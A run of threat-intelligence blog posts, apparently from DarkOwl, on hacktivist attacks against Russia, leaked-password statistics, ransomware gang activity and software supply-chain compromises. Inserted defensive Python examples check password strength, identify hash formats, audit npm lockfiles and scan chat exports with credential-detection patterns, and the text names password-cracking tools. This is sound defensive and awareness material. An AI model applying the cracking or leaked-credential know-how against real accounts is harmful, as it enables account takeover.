Anonymous retaliated against these coordinated disinformation efforts by hacking Russia’s Roskomnadzor information and propaganda agency and its All-Russian State Television and Radio Broadcasting Company (VGTRK), leaking over 900,000 emails and 360,000 files from across the organizations which detail how television and radio are tightly regulated and programs censored directly by the Kremlin.

In anticipation of Russian propaganda expected to be broadcast on Victory Day on May 9th, Anonymous successfully compromised Russian state television, changing nearly every television program description during Victory Day ceremonies to read:

“The blood of thousands of Ukrainians and hundreds of their murdered children is on your hands. TV and authorities are lying. No to war.”
Figure 2: Television Program Description from Russian State TV Programming Hack (Source: Anonymous)

Virtual private network (VPN) use in Russia has skyrocketed, increasing over 3,000% since mid-February. According to open sources, at least some percentage of curious Russian citizens are bypassing censorship by using VPNs to access international news about Ukraine and social media platforms. As of this week, reports estimated an average of 300,000 downloads of VPN applications occurred every day.

The first fallout in the darknet from the cyberwar was direct attacks against the CONTI ransomware gang shortly after they publicly declared their support for Russia’s invasion. A Ukrainian-based ‘security researcher’ took to Twitter to leak CONTI’s ransomware source code, details of their internal operations, botnet infrastructure, along with private jabber chats and PII from members of the team.

Similar leaks followed for members of the FSB-backed Trickbot group including dossiers of their members.

Several darknet forums, marketplaces, and XMPP chat servers were taken offline, and information leaked in a digital public shaming for each group’s association with Russia.

In March, Kelvinsecurity exploited a simple IDOR vulnerability on the darknet site DATABASE Market, leaked the contents of the market’s SQL database, and deanonymized the server, publishing the IP address of its host located in St. Petersburg.

Earlier this month, a member of Anonymous known as v0g3lsec hacked a Russian-linked darknet vendor shop and replaced the site’s content with a description of squad303’s information service and a link to their surface website.

Figure 3: Tor Service Defacement by v0g3lsec

Network Battalion (nb65) successfully deployed CONTI’s leaked ransomware source code with a modified cipher and has carried out over half a dozen attacks against targets across Russia. Their most recent attack involved the Qiwi Кошелек Russian payment system, with over 149,000 kiosks and terminals around the country. Earlier this week, the group shared a database containing over 7 million unique credit card numbers and associated PII for Qiwi platform users in Russia.

Critical Infrastructure Attacks

We have not observed a mass disruption of Russia’s critical infrastructure such as gas, power, and water supplies. This is likely because, as in the US, such systems are decentralized and distributed across various districts across the country. However, some limited interruption has been observed during the conflict. In early March, Cyber Partisans utilized industrial control system (ICS) attacks to shut down train lines supplying the Russian military in Belarus. Automated ticketing stations were knocked offline, forcing the transportation authorities to issue paper tickets and causing delays.

Oil and gas related entities in Russia such as Gazprom Linde, MashOil, Neocom Geoservice, Enerpred, Aerogas, and Technotec have all suffered cyberattacks resulting in thousands of internal Microsoft Exchange emails leaked on the deep web. In late April, multiple explosions occurred, resulting in catastrophic fires and injuries at the Druzhba oil depot. Subsequent open-source reports on Telegram suggest that the explosions at the Transneft-Druzhba Oil Depot, a supplier for military units, were ‘delivered with the help of drones’ from Ukraine. The depot and associated pipeline are the main route for getting Russian oil to its European customers, although EU leaders have signaled a plan to stop purchasing oil from Russia by the end of the year, which may lead to a full embargo across the continent.

In recent weeks, several other mysterious fires across the country have been reported, including an ammunition depot in Staraya, another ammunition plant in the Russian town of Perm, an aviation school in the same village of Perm, a government building in Korolev, a chemical plant near the border of Ukraine, an oil depot in Belgorod, a defense research center in Tver, a pro-Kremlin publishing house in Moscow, a storage hangar in the Bogorodskoe district, and oil tanks set on fire in the industrial zone of Nizhny Novgorod.

Another random fire also started in Belgorod less than two days ago. Reports have not specified where the fire originated specifically.

Figure 4: Recent Explosions in Belgorod Captured by Social Media Users (Source: VK)

It is unclear from reporting whether these explosions were a result of SCADA cyberattacks or direct arson and sabotage by Russian locals sympathetic with the situation in Ukraine. The darknet threat group GhostSec recently compromised Russia’s Metrospetstekhnika ASOTP system for transportation and successfully caused dozens of trains connected to the system to cease operation. The group claims they were able to access and disrupt the internal temperature, smoke, and backup battery systems for any of the trains connected to the network.

Figure 5: Announcement of Metro Train Attack by GhostSec (Source: Telegram)

Anonymous Leaks Stolen Data

Within days of the invasion, targeting information and exfiltrated data from targets across Russia surfaced on the deep web. DarkOwl has been monitoring mentions and announcements of data leaked in relation to the war since the start of the cyberwar and found hundreds of leaks related to numerous government and commercial industrial sectors across Russia, Belarus, and China. The chart below demonstrates the volume of unique URLs observed containing information related to the war. In the early days, much of the leaked information consisted of network reconnaissance information (IP addresses, domains, credentials) for carrying out attacks against critical targets, and PII for government, military, and citizens of Russia.

As the war progressed, stolen data of all kinds, e.g. intellectual property, design schematics, military plans, financial account data, and emails, appeared. While in recent weeks the number of unique leaks is smaller, the contents contained therein are higher in volume and significant in value. For example, over the last two weeks, Anonymous has released – via DDoSecrets – over 3TB of data archives containing thousands of emails and sensitive internal documents from victim organizations across Russia.

Figure 7: Distribution of Data Leaks from the Cyberwar by Industry Sector

Nearly 90% of the leaks DarkOwl has observed are related to targets in Russia. The figure below is a distribution of the non-Russian countries’ information that has surfaced, with direct mention of the cyberwar. The threat actor group AgainstTheWest (ATW) concentrated on technology, government, and financial targets across China in the weeks following the invasion. ATW has since stopped participating in the campaign.

Figure 8: Percentage of non-Russian Data Leaked with Direct Mention of Global Cyberwar

Russia’s Response Takes Many Forms

Readers should not be fooled into thinking that this data means that Russia is sitting back idly during these attacks. In addition to the crippling Viasat attack the day of the invasion and widespread propaganda dissemination, GRU-affiliated cyber actors have regularly attacked Ukrainian telecommunications and critical infrastructure alongside its ground-based offensives. Elon Musk also recently stated that Starlink satellites in use by the Ukrainian government for Internet broadband access are under frequent targeted signal jamming by Russian-linked hackers.

State-sponsored malicious cyber actors, ransomware and affiliated extortion groups linked to Moscow continue to spray US and western European companies with widespread spear-phishing attacks and malware deployment. During our recent review, we estimate ransomware gangs successfully encrypt on average a dozen organizations per day.

DarkOwl will continue to monitor the darknet and deep web for critical information pertaining to the quickly evolving cyber landscape.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.


All Your Passwords Belong to Us

May 05, 2022

In honor of World Password Day – a date established in 2013 by Intel Corporation to foster security awareness – the content team at DarkOwl decided to compile some interesting statistics based on the email and password entities available in the DarkOwl Entity API.

DarkOwl’s Entity Volume

Every day we hear of another commercial data or app breach. At this point, everyone can assume their email address and/or password has been leaked on the darknet or deep web. DarkOwl has collected and tokenized over 8.68 billion (with a “B”) email addresses. 5.46 billion of those emails include a password. 57% of those email addresses include a ‘plaintext’ or legible password.

But My Password is Complex!

If you’re still using your cat’s name followed by the exclamation point (“Fritzie!”), your password is not complex, and you have most likely already experienced an account compromise. But, you’re not alone. Complex, lengthy passwords are not the norm across DarkOwl’s data.

The most common password length is 8 characters.

Figure 1: Distribution of Password Volume by Password Character Length

Is an 8-character length password strong enough?

The strength of an 8-character password depends on the motivation and the tools available to the cybercriminal targeting your account. There are plenty of password ‘cracking’ tools readily available to hackers to conduct dictionary and brute force style password attacks. Some of the most popular tools include:

  • John the Ripper
  • Cain & Abel
  • OphCrack
  • THC Hydra
  • Hashcat
  • Brutus
  • RainbowCrack
  • CrackStation

Even the most sophisticated password crackers will need significant processing power and time to successfully break long, complex passwords. Unless an 8-character password includes numbers and symbols, it can potentially be brute forced.

Figure 2: Time to Crack Passwords of Varying Degrees of Character Length and Complexity

Over 4 billion of the passwords (4,285,451,030) available in DarkOwl’s Entity API are 32 characters or less. 662,341,057 passwords could be classified as extreme and greater than 32 characters in length.

Figure 2 demonstrates that passwords including numbers and symbols are harder to crack than letters alone. DarkOwl’s data contains a significant volume of passwords with some degree of complexity but only 637 million plaintext passwords would be classified as “strong.”

Strong passwords are defined here as containing special characters, digits, lowercase, uppercase, and a length greater than 8 characters.

Passwords That Age Us

Do you have a favorite year that you include in your password for uniqueness? Perhaps it’s your birthday year or anniversary. Both are very common. We found over 707 million passwords include a year string that starts with “19XX” or “20YY.”


According to our data distribution, peak volumes of passwords fall in the year range 1980 to 1994. The most frequent years we observed were:

1990: 14,006,141

1987: 13,795,566

Figure 3: Distribution of Passwords Containing a Date (Year) String

QWERTY is Simply Lazy

The “QWERTY” keyboard layout originated in the late 1860s and was designed to help people type and translate Morse code faster. Regardless of its origins, people heavily rely on the top row of the American keyboard characters in many password fields; 5,793,906 passwords in the DarkOwl Entities API contain the 6-character string “qwerty.”

Even worse are sequential numbers, with 29,010,394 passwords consisting of “123456” and 11,718,471 going to the trouble of adding the whole number set, “123456789.”

DarkOwl has collected 5,857,363 passwords using the laziest password of all: the word, “password.”
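The post’s own strength definition (special characters, digits, lowercase, uppercase, length greater than 8) and the weak patterns it counts (a year string, “qwerty”, “123456”, the word “password”) are easy to turn into a policy check. The following Python is an example added for this page, not DarkOwl’s tooling; the sample passwords are constructed, and the pattern labels (“year”, “qwerty”, “sequential”, “password”) are my own names.

```python
import re

# Constructed sample, not data from the DarkOwl Entity API.
SAMPLE_PASSWORDS = [
    "Fritzie!",       # the post's cat-name example: 8 chars, no digit
    "summer1990",     # contains a year string
    "qwerty123",      # keyboard-row string
    "password",       # the word itself
    "123456789",      # sequential digits
    "Tr0ub4dor&3!",   # meets every criterion in the post's definition
    "abc12345",       # 8 chars, no uppercase or symbol
]

YEAR_RE = re.compile(r"(?:19|20)\d{2}")      # "19XX" or "20YY" as in the post
SPECIAL_RE = re.compile(r"[^A-Za-z0-9]")     # anything that is not a letter or digit


def is_strong(password):
    """Apply the post's definition: special char, digit, lowercase,
    uppercase, and length greater than 8 characters."""
    return (
        len(password) > 8
        and any(c.islower() for c in password)
        and any(c.isupper() for c in password)
        and any(c.isdigit() for c in password)
        and SPECIAL_RE.search(password) is not None
    )


def weak_patterns(password):
    """Return the labels (my own names) of the post's weak patterns found in the password."""
    lowered = password.lower()
    found = []
    if YEAR_RE.search(password):
        found.append("year")
    if "qwerty" in lowered:
        found.append("qwerty")
    if "123456" in lowered:
        found.append("sequential")
    if "password" in lowered:
        found.append("password")
    return found


def summarize(passwords):
    """Aggregate the same kind of statistics the post reports: most common
    length, how many passwords are 'strong', and counts per weak pattern."""
    lengths = {}
    pattern_counts = {}
    strong = 0
    for pw in passwords:
        lengths[len(pw)] = lengths.get(len(pw), 0) + 1
        if is_strong(pw):
            strong += 1
        for label in weak_patterns(pw):
            pattern_counts[label] = pattern_counts.get(label, 0) + 1
    # ties on count resolve to the shorter length
    most_common_length = max(lengths, key=lambda n: (lengths[n], -n))
    return {
        "total": len(passwords),
        "most_common_length": most_common_length,
        "strong": strong,
        "patterns": pattern_counts,
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_PASSWORDS))
    for pw in SAMPLE_PASSWORDS:
        print(f"{pw!r:16} strong={is_strong(pw)} patterns={weak_patterns(pw)}")
```

The same functions can be run over a real password policy test set or a breach-notification feed; only the constructed list above is specific to this example.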

Hashed Passwords > Plaintext

Billions of leaked plaintext passwords are tragic, no matter the complexity, character length, or whether a date string or qwerty is included. Therefore, if you suspect a plaintext password you use or have used in a commercial webservice has been compromised, change it immediately and cease using it on any authentication logins. Credential stuffing campaigns exploit password reuse and utilize email address and password combinations to attempt logins outside of the source of the original leak.

Given the propensity for commercial data breaches, most authentication and digital identity protection platforms strongly suggest that users’ passwords be stored in a hashed format instead of plaintext to reduce the likelihood of immediate malicious use upon compromise.

6% (518,566,724) of the passwords available in DarkOwl’s Entity API are hashed passwords.

In cryptography, hashing involves using a mathematical algorithm to map data of any size into a bit string of a fixed size. In password hashing, a ‘hash’ consists of a unique digital fingerprint (of a fixed size) corresponding to the original plaintext password which cannot be reversed. There are several different types of ‘hashing algorithms’ available for protecting stored passwords.

The most common hash in DarkOwl’s data is MD5 followed by SHA-1.

Some MD5 hashes in phpBB and WordPress appear as 34 characters instead of 32. DarkOwl has 345,431 hashed passwords consisting of 34 characters.

Both MD5 and SHA-1 have been deemed vulnerable as they are subject to collision attacks and dehashing. One of the most popular password hacking programs to date, Hashcat, contains lookup tables for popular wordlists like RockYou, allowing the original plaintext password to be deciphered.
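To make the hash formats above concrete, and to show why a lookup table works against them, here is an example added for this page (not DarkOwl’s code). It identifies a hash by its shape (32 hex characters for MD5, 40 for SHA-1, and the 34-character phpBB/WordPress “phpass” form, which begins `$P$` or `$H$`), then contrasts unsalted MD5, where equal passwords always produce the identical hash so one precomputed table serves every leaked database, with a salted, iterated PBKDF2-HMAC-SHA256 hash from the standard library, where the same password hashes differently every time. The stored-string format `pbkdf2_sha256$iterations$salt$digest` is my own choice, and the 600,000-iteration default follows current OWASP guidance for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os
import re

# Hash formats mentioned in the post: plain MD5 (32 hex chars), SHA-1 (40 hex
# chars) and the 34-character phpBB/WordPress form. The latter is the "phpass"
# portable hash: "$P$" or "$H$", one iteration-count character, an 8-character
# salt and a 22-character encoded digest, all from the ./0-9A-Za-z alphabet.
HASH_FORMATS = [
    ("phpass (MD5-based, 34 chars)", re.compile(r"^\$[PH]\$[./0-9A-Za-z]{31}$")),
    ("MD5", re.compile(r"^[0-9a-fA-F]{32}$")),
    ("SHA-1", re.compile(r"^[0-9a-fA-F]{40}$")),
]


def identify_hash(value):
    """Guess the hash format from its shape alone (length and alphabet)."""
    for label, pattern in HASH_FORMATS:
        if pattern.match(value):
            return label
    return "unknown"


def unsalted_md5(password):
    """The weak scheme: no salt, so equal passwords always give equal hashes,
    which is exactly what makes a precomputed lookup table reusable."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """A salted, deliberately slow alternative using only the standard library.
    The output format ("pbkdf2_sha256$iterations$salt$digest") is my own choice."""
    if salt is None:
        salt = os.urandom(16)                      # fresh random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt/iterations and compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_hash_for_same_password(scheme, password):
    """True if hashing the same password twice yields the same stored value."""
    return scheme(password) == scheme(password)


if __name__ == "__main__":
    for sample in (unsalted_md5("password"),
                   hashlib.sha1(b"password").hexdigest(),
                   "$P$B" + "x" * 30):
        print(f"{sample}  ->  {identify_hash(sample)}")
    print("MD5 repeats for equal passwords:   ", same_hash_for_same_password(unsalted_md5, "password"))
    print("PBKDF2 repeats for equal passwords:", same_hash_for_same_password(pbkdf2_hash, "password"))
    stored = pbkdf2_hash("correct horse", iterations=50_000)
    print("verify correct:", pbkdf2_verify("correct horse", stored))
    print("verify wrong:  ", pbkdf2_verify("incorrect horse", stored))
```

Identification by shape is a heuristic: a 32-character hex string could also be an NTLM hash or a truncated digest, so treat the label as a starting point for triage rather than proof.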

Password Strengthening Tips

Although you can’t prevent commercial services getting breached and usernames, email addresses, and password combinations getting leaked, you can follow some simple steps to ensure you employ robust password hygiene and reduce the risk of a password getting brute forced or exploited in a credential stuffing campaign.

  • Use an automated complex password manager like LastPass, BitWarden, or 1Password.
  • Don’t reuse passwords. Have a unique password for every login and streaming service you sign up for.
  • Choose passwords at least 16 characters in length.
  • Include symbols and numbers for increased complexity.
  • Avoid using passwords with dictionary words or names.
  • Don’t use sequential numbers or the word “password.”
  • Don’t use the year of your birth or anniversary in your password.
  • Turn on multi-factor authentication (MFA) for important accounts like financial and banking sites.

Celebrating World Password Day

Today’s World Password Day is a perfect time to pause and review the security – or lack thereof – of your most common password habits. After reading this blog, we invite you to consider taking the following actions today:

  • Review passwords stored in your keychain, password managers, or sticky notes.
  • Change any passwords you might be reusing across multiple sites.
  • Share password tips on social media with friends and family (#WorldPasswordDay).
  • Transform a weak password into a strong one using the password strengthening tips above.
  • Turn on MFA for all important accounts.


Ransomware Resurgence and Emergence: Continued Analysis of RaaS Activity Since the Invasion of Ukraine

May 04, 2022

Ransomware on the Darknet Continues

Figure 1: Netblocks Status of Vodafone, 6 March 2022

The interruption in victim announcements was more like a slow-down and did not last long, with a quick ramp up from the major RaaS industry players: CONTI, Lockbit 2, and CL0P announced dozens of victims during the month of April.

LockBit2 – a gang that “claimed” neutrality in the Russian-Ukraine war – has the highest number of total victims since the 24th of February at 280. That’s an average of 4.5 victims per day by a single group.

DarkOwl is currently tracking 25 active ransomware groups. Across those groups, the total number of victims – just since 24 February – totals 813, presenting an even more worrisome average of 11.8 victims per day.

Figure 2: Scatter plot distribution of daily ransomware victims per RaaS gang

Critical Infrastructure Targeted

Unsurprisingly, victims include several US and NATO-based critical infrastructure organizations and suppliers including local government municipalities, electrical and alternative power providers, water, telecommunications, and transportation suppliers.

DarkOwl also observed an increase in manufacturing and construction-related companies with downstream victims including international lumber and steel processing companies mentioned quite frequently.

CONTI announced last week they successfully encrypted US-based MACK Defense, LLC, a major parts supplier and sales organization attached to the MACK trucking company. This will likely cause further interruptions to an already encumbered and fatigued US ground-based supply chain.

Meanwhile, Snatch leaked over a gigabyte of data from a popular European travel website, TUI Group.

Figure 3: CONTI Announcement of Ransoming MACK Defense, LLC

Ransomware groups have announced at least half a dozen victims across electrical, water, or natural gas-affiliated suppliers in the US, Canada, and Europe in the last 10 days.

In March, German wind-turbine supplier Nordex suffered a severe cyber incident carried out by CONTI shutting down over 5,000 wind turbines across the country. On April 23rd, CONTI leaked 145GB of exfiltrated data related to the company, archived across 82 compressed data files. The Nordex cybersecurity incident was likely a critical infrastructure retaliation attack for Germany’s support of Ukraine.

HiveLeak and AlphaV’s activity also increased significantly with nearly 100 victims between the two RaaS gangs alone. Vice Society also leaked 20 victims in the last 10 days of April after previously having a relatively slow ransomware

Figure 4: Statement from Snatch Ransomware

The Resurrection of REvil

REvil’s “Happy Blog” suddenly appeared online and operational on April 20th on the Tor network, redirecting to a new URL which announced 5 victims. The last victim posted by the REvil group was in mid-October 2021, shortly before the site began returning 404 errors and rumors emerged suggesting the FBI had seized the admin panel and deleted the Tor service using UNKN’s or another admin’s keys.

According to the BBC, members of the REvil RaaS operation were reportedly taken into custody by the Russian FSB after an international law enforcement operation last December.

The redirected URL includes a link to “Join Us” with a request for affiliates to contact them using a Tox address provided. The advertisement continues their historical 80/20 ransom split and states they have a “Тот же проверенный (но улучшенный) софт” [TRANSLATED] “The same proven (but improved) software.”

Figure 5: REvil’s Latest Call for Affiliate Partners

The new REvil Tor service boasts an odd mix of victims, including an oil and gas company in India, an asphalt production company, and a corporate signage company. By the end of the month, the service was offline and inaccessible. The intentions behind revitalizing the REvil Tor service are unclear, but the timing was nearly coincident with the US closing diplomatic channels with Russia on cybersecurity.

The resurrection of REvil could indicate that President Putin has released arrested ransomware operators to carry out retaliatory attacks against critical targets in the US and Europe.

New Ransomware Groups and Patterns Emerge

A new RaaS group called Blackbasta appeared online and announced 11 new victims on the 26th of April. Blackbasta uses the ChaCha20 and RSA-4096 ciphers, an upgrade from groups like Maze and Sekhmet that utilized ChaCha20 and RSA-2048. They also call their Tor victims’ page “Basta News,” playing off the CONTI marketing strategy.

Figure 6: Blackbasta Tor Service “Basta News” 30 April, 2022

Another new group, Onyx ransomware started leaking their victim data on a Tor service titled, “Onyx News” with 7 new victims added at the end of April. The victims appear to be primarily small businesses and organizations, including a local US police office and a couple of family medical practices.

The x001xs ransomware group appears to have pivoted to a different underground industry with no victims announced since late January. Their Tor service also now redirects to a darknet credit card provider called “BitCarder.”

RaaS group activity across the whole industry has steadily increased over the last 10 days. When visualizing the various groups’ victim announcements as a function of post-date, they demonstrate quite noticeable “peaks and valleys” that suggest less publishing collectively occurs on weekends.

The outlier for this trend is CL0P who drops several groupings of victim announcements only around the weekends. The CL0P group was much less active in March with announcements only at the beginning and end of the month.

Figure 7: Daily Distribution of Total Victims Per Day Across All Groups, with 3pt Moving Average Filter

Ransoming Russia

Since the end of March, an Anonymous-linked, pro-Ukrainian cyber threat cell known as Network Battalion ’65 (or simply nb65) has carried out cyberattacks against Russian entities using ransomware. The group alleges they are deploying a variation of the leaked CONTI ransomware source code, which surfaced shortly after the invasion. We have identified and downloaded at least half a dozen data leaks provided by the nb65 group that accompanied the group’s announcement of the CONTI code use.

Figure 8: nb65 Announces Use of CONTI ransomware Against JSC Bank of Russia

Hackers Hacking Hackers

On 20 March, Arvin Club published a data leak associated with the pro-Russian aligned STORMOUS ransomware gang. Arvin claimed the group poorly configured their ‘new’ Tor service after mirroring their Telegram content to the anonymous network. It was unclear whether this was motivated by malice or geopolitical alliances.

In early March, STORMOUS posted an official statement to their Telegram channel stating they did not intend to attack Ukraine but could not sit back and watch attacks against the country [Russia] that “means so much to us.” They also included CONTI’s logo and the handshake emoji with their respective hashtags, symbolizing some level of partnership.

Figure 9: Arvin Club Leak of STORMOUS Info on Tor | STORMOUS World Announcement

In the last month, Russian ransomware groups and threat actors have been actively targeting pro-Ukrainian cybersecurity researchers and Anonymous-linked cyber cells. Many researchers have been doxed and threatened across social media and Telegram in vendetta-like attacks.

Figure 10: Twitter Post Warning Anons that Russian Ransomware Gangs are Targeting the Anonymous Collective


Version Control Systems and Software Supply Chain Risk

A review of the ongoing darknet risks associated with the compromise of Version Control Systems (VCS) and other software supply chain version control systems. Our full report can be found here.

Research from DarkOwl analysts continues to indicate that software programming and engineering tools are a viable exploitation vector.

Last week, a maintainer of an NPM package – NPM being a widely used package manager for the JavaScript programming language – showcased how potentially powerful supply chain attacks on software development and components can be. This individual, an open-source software developer known as RIAEvangelist, intentionally embedded malware in the latest stable release of a popular repository called node-ipc in protest of Putin’s atrocities against Ukraine. The malware is officially labeled ‘peacenotwar’ and deploys with a readme file titled WITH-LOVE-FROM-AMERICA.txt, and notably is only triggered to install on devices with a Belarus or Russia geo-located IP address.

Developers and security researchers around the world have been equally appalled and conflicted by the intentional sabotage of an open-source software package. Many are particularly concerned about the reputational damage these incidences cause to the open-source software development movement.

Despite general widespread sentiment against Putin’s invasion of Ukraine, the open source software development community has marked RIAEvangelist’s NPM package as malicious, because this individual chose to deploy malware in the digital supply chain ecosystem.

“This code serves as a non-destructive example of why controlling your node modules is important. It also serves as a non-violent protest against Russia's aggression that threatens the world right now. This module will add a message of peace on your users’ desktops, and it will only do it if it does not already exist just to be polite.” 

     - peacenotwar source code description

Exploitation of software-build processes and code repositories facilitates wider, more catastrophic distribution of malware and enterprise-level software compromise. By poisoning software development, update processes, and linked dependencies, threat actors’ malicious code can potentially be distributed to thousands of users without the need for social engineering, e-mail compromise, or drive-by-download malware delivery mechanisms.
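The quoted description calls the incident an example of “why controlling your node modules is important.” As an added example for this page (not code from the node-ipc project or from DarkOwl), the following Python performs that kind of control check on a manifest and lockfile: it flags dependencies whose version specifier is a floating range (which `npm install` without a lockfile, or `npm update`, can re-resolve to a newer release), dependencies missing from the lockfile, and lock entries that carry no integrity hash. Both JSON documents are constructed for this example; the package names are illustrative and `sha512-PLACEHOLDER` stands in for a real integrity value.

```python
import json
import re

# Constructed package.json for this example; names and versions are illustrative.
PACKAGE_JSON = """
{
  "name": "demo-app",
  "dependencies": {
    "node-ipc": "^9.2.1",
    "left-pad": "1.3.0",
    "lodash": "~4.17.20",
    "express": "*",
    "minimist": "1.2.6"
  }
}
"""

# Constructed lockfile (lockfileVersion 2 layout). "sha512-PLACEHOLDER" stands
# in for a real integrity hash; "minimist" is deliberately absent.
PACKAGE_LOCK = """
{
  "name": "demo-app",
  "lockfileVersion": 2,
  "packages": {
    "node_modules/node-ipc": {"version": "9.2.2", "integrity": "sha512-PLACEHOLDER"},
    "node_modules/left-pad": {"version": "1.3.0", "integrity": "sha512-PLACEHOLDER"},
    "node_modules/lodash":   {"version": "4.17.21"},
    "node_modules/express":  {"version": "4.18.2", "integrity": "sha512-PLACEHOLDER"}
  }
}
"""

# An exact pin: MAJOR.MINOR.PATCH with an optional prerelease tag. Anything
# else (^, ~, *, ranges, tags such as "latest") can resolve to a different release.
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$")


def audit_dependencies(package_json, package_lock):
    """Return (name, finding, detail) tuples for the three risks described above."""
    deps = json.loads(package_json).get("dependencies", {})
    locked = json.loads(package_lock).get("packages", {})
    findings = []
    for name, spec in sorted(deps.items()):
        if not EXACT_VERSION.match(spec):
            findings.append((name, "floating-range", spec))
        entry = locked.get(f"node_modules/{name}")
        if entry is None:
            findings.append((name, "not-in-lockfile", spec))
        elif "integrity" not in entry:
            findings.append((name, "no-integrity", entry.get("version")))
    return findings


if __name__ == "__main__":
    for name, finding, detail in audit_dependencies(PACKAGE_JSON, PACKAGE_LOCK):
        print(f"{name:10} {finding:16} {detail}")
```

With a committed lockfile, `npm ci` installs exactly the locked versions, so the floating ranges matter when the lockfile is absent, regenerated, or refreshed with `npm update`; a missing integrity field means the installer cannot detect a tarball that differs from what was originally resolved.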

In recent months, DarkOwl has observed a significant increase in instances of malware developers mentioning or discussing direct attacks on the international software supply chain. In many cases, this chatter was centered around plans that involved targeting popular open-source software developer repositories like GitHub and Bitbucket, as well as associated software digital support infrastructure.

Exploiting Version Control Systems (VCS) and poisoning supply chains is not a new threat vector. In 2021, the Kaseya ransomware attack – via a simple malicious software update pushed to thousands of users by notorious ransomware gang, REvil – highlighted the extensive threat to software supply chains and cloud-based commercial software repositories. (Source)

In December 2020, the SolarWinds attack similarly inspired international concern for the integrity of commercial enterprise software and underscored the need for widespread implementation of zero trust architectures. (Source)

Another example of a threat actor group exploiting digital supply chain vulnerabilities is the hacking group LAPSUS$. The increasingly active group most recently announced that they had acquired privileged access to digital authenticator Okta’s networks via a support engineer’s thin client. The result of Okta’s compromise exposed significant intelligence findings, and highlights the overarching risks at stake to any software development and operational lifecycle. (Source)

Brief summary of how LAPSUS$ leveraged supply chain exploits to compromise global software company Okta:

  • LAPSUS$ most likely gained access to Okta using credentials purchased on the deep web marketplace: Genesis Market, proving the underground continues to feed criminal empires.
  • AWS credentials and code repository tokens were likely stored in company Slack messaging systems that LAPSUS$ then utilized to move laterally through peripherally associated digital infrastructure.
  • LAPSUS$ clearly stated they were not interested in Okta, but the customers Okta supported and had access to.
  • Okta’s implementation of zero trust architectures was called into question given the level of access available to a third-party support engineer account.
  • Okta estimates at least 366 unique clients’ organizational data could have been accessed by the threat group via the initial compromised privileged access.

We are witnessing – in real time – the terrifying realization of the dangers to software supply chains via malicious compromise of the tools and infrastructure critical to supporting the software development lifecycle. Any product or service that touches one’s network, e.g. customer relationship management (CRM) software, software version control (VCS) utilities, authenticators, payroll and timekeeping accounting systems, cloud service providers, and internal employee messaging platforms (Slack, Teams, etc.), is a potential target for compromise.
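The second bullet above, AWS credentials and code repository tokens sitting in Slack messages, is the kind of exposure a periodic scan of chat exports can surface before an intruder does. The following Python is an added, defender-side example (not DarkOwl’s or Okta’s code): it runs credential-shaped patterns (AWS access key IDs, an AWS secret key beside its variable name, GitHub and Slack tokens) over a constructed Slack-style export and reports each hit with the secret redacted. The messages are constructed; the AWS key and secret are the placeholder values from AWS’s own documentation, the GitHub and Slack tokens are made-up strings of the correct shape, and the finding labels are my own.

```python
import re

# Constructed Slack-style export for this example. The AWS key and secret are
# the placeholder values used in AWS's own documentation; the GitHub and Slack
# tokens are made-up strings of the right shape. None of them is a live credential.
MESSAGES = [
    {"user": "alice", "text": "deploy creds: AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE "
                              "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"},
    {"user": "bob",   "text": "use ghp_0123456789abcdefghijklmnopqrstuvwxyz for the repo mirror"},
    {"user": "carol", "text": "lunch at 12?"},
    {"user": "dave",  "text": "bot token xoxb-1234567890-abcdefghijkl"},
]

# Well-known token shapes: AWS access key IDs start with AKIA/ASIA and are 20
# chars; GitHub tokens are a gh?_ prefix plus 36 chars; Slack tokens start xox?-.
# The AWS secret key has no fixed prefix, so it is only matched next to its
# variable name. The labels are my own.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("aws_secret_access_key",
     re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*([0-9A-Za-z/+]{40})")),
    ("github_token", re.compile(r"\bgh[pousr]_[0-9A-Za-z]{36}\b")),
    ("slack_token", re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}\b")),
]


def redact(secret):
    """Keep just enough to correlate (first 4 / last 2 chars) without re-leaking it."""
    return f"{secret[:4]}****{secret[-2:]}"


def scan_messages(messages):
    """Return one finding per credential-shaped string, with the secret redacted."""
    findings = []
    for msg in messages:
        for kind, pattern in PATTERNS:
            for match in pattern.finditer(msg["text"]):
                # use the capture group when the pattern has one, else the whole match
                secret = match.group(match.lastindex or 0)
                findings.append({"user": msg["user"], "kind": kind, "redacted": redact(secret)})
    return findings


if __name__ == "__main__":
    for f in scan_messages(MESSAGES):
        print(f"{f['user']:6} {f['kind']:22} {f['redacted']}")
```

A hit from a scan like this should trigger rotation of the credential first and cleanup of the message second; the redacted prefix and suffix are enough to match the finding against the key inventory without copying the secret into a ticket.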

Research from our analysts

Version control systems and software supply chains are a viable and highly consequential attack vector readily exploited by cybercriminal organizations, nation state actors, and hacktivists from the darknet. DarkOwl believes there will be continued and increased attacks against dependency libraries and software package managers, such as NPM and PyPI, with the intention of stealing information and establishing long term persistence in the victim machines. Read full report here.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.

Review of Ransomware Gang Activity Since Ukraine Invasion

In light of disturbances in the darknet due to nationalistic fractures amongst ransomware and cybercriminal groups, DarkOwl analysts did a cursory review of activity across ransomware-as-a-service (RaaS) gangs since the invasion of Ukraine.

We reviewed the number of reported victims by RaaS groups and the location of the victims, and determined the following:

  • Conti and Lockbit 2.0 lead in total number of victims announced since the 24th of February, 2022.
